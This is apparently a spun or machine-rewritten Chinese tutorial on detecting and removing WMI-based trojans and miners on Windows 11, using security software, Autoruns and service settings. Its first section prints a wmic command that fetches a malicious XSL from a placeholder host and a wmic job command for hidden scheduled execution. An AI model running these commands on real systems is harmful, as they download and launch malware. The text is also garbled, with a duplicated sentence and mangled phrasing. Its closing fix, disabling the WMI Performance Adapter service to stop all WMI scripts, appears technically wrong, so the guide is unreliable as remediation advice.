怎么彻查Win11的WMI木马

WMI是一个windows11系统的核心功能，我们可以使用这个功能来实现脚本部署、进程列举、监控目录修改等常见操作，但总有一些恶意的人植入木马病毒，一旦WMI植入木马病毒，由于其特殊性，会对我们的系统造成非常严重的损害，那么如何解决这个问题呢？感兴趣的朋友可以往下看。

Win11 WMI共享木马查杀方法

1. 了解WMI恶意软件的运行机制

如上所述，WMI功能非常丰富，对于黑客来说，只要使用命令就可以完成许多操作。例如，在获得相应的权限后，在目标计算机上使用wmic os get /FORMAT:"http://www.xxxx.com:80/123.xsl"命令可以从网站服务器上下载恶意软件123.xsl(图1)。

当然，这些恶意软件也可以在实际操作中使用WMI更多的操作，如使用wmic job call create "123.exe",0,0,true,false,********154800.000000 480命令在后台创建任务计划，创建系统服务甚至可以执行DLL文件注入系统过程等操作。因为这里使用系统命令(wmic.exe)，它不像传统的木马和病毒那样由本体执行，所以被称为无文件(严格来说是WMI脚本操作，脚本触发后下载木马等操作)。因为这里使用系统命令(wmic.exe)，它不像传统的木马和病毒那样由本体执行，所以被称为无文件(严格来说是WMI脚本操作，脚本触发后下载木马等操作)。例如，臭名昭著的Kingminer挖木马，它通过WMI事件订阅不断触发木马在后台运行。

●火速链接：

2018年6期本刊文章WMI介绍了过程资源占用问题WMI相关知识。

2. 发现和识别WMI恶意软件

WMI木马的一个重要特点是使用木马WMI脚本下载或激活木马运行。比如某WMI挖掘木马感染计算机将在系统中生成任务计划，任务将连接到服务器下载挖掘木马。采矿木马在运行后会占用大量的系统资源和带宽，导致采矿木马Windows在日常使用中运行缓慢，网页打开速度变慢，计算机硬盘指示灯一直在闪烁（因为木马会在后台读取数据）。如果您的计算机在使用时出现上述异常现象，则需要使用安全软件来检查您是否被木马击中。

Windows 10用户可以使用系统自带的安全中心进行检查和杀戮。如果问题无法解决，他们可以使用一些木马杀戮软件，如火绒恶性木马杀戮工具(https://bbs.huorong.cn/thread-18575-1-1.html)查杀，启动软件后点击立即扫描，常见的木马(包括WMI木马一般可自动查杀(图2)。

但是，如果中了WMI木马，安全软件只会WMI删除脚本下载的木马文件，但不能完全切断WMI下载木马文件的方式，如上述介绍WMI采矿木马利用任务计划下载。由于任务计划中没有恶意软件，安全软件不会删除，所以在通过特殊杀死软件删除木马后，每次重新启动系统扫描或总是提示找到木马文件后，很可能会被删除WMI木马，此时还需要检查系统的启动项，检查是否有异常启动项。

可以借助系统启动项检Autoruns来完成(https://docs.microsoft.com/zh-cn/sysinternals/downloads/autoruns)，启动程序后，它将自动检测计划任务、服务、WMI等(图3)。

例如，当作者公司的计算机进行安全扫描时，发现木马文件无法完全删除，并在本机上运行Autoruns切换到计划任务后，在打开的窗口中可以看到后台的所有任务计划。对于没有数字签名的任务，程序将用浅红色标记，您可以看到本机中的一个名称lsmosee任务极其可疑，它加载了临时目录中的一个VBS文件(图4)。

在上图中选择lsmosee右击，选择跳转到文件夹，根据图中镜像路径的提示，使用记事本打开54236.vbs文件中显示了一些WMI脚本的内容，定期在后台下载木马文件。现在按提示删除。然后返回上图，选择lsmosee单击删除任务，以切断木马的下载通道。最后，用火绒安全软件再次扫描电脑，删除其他有毒文件后，问题得到顺利解决(图5)。

3. 一劳永逸封禁WMI木马下载

WMI木马之所以难以查杀，是因为它的下载方式是通过WMI实现脚本，而且WMI激活脚本的方法有很多(比如上面的任务计划，有的是注入使用过程等。)，但是WMI脚本的操作取决于WMI Performance Adapter服务，所以对于个人用户通过停用服务来禁止WMI脚本的操作。将服务输入桌面任务栏搜索框，打开服务管理组件，找到上述服务，双击停止，并将启动类型设置为禁止，以便所有本机WMI脚本无法运行(图6)。

注意：

禁用WMI一些网络服务可能无法使用。如果禁用服务影响计算机的使用，请及时恢复。

以上是小编带给你的Win11 WMI如有疑问，请多关注手机教程频道！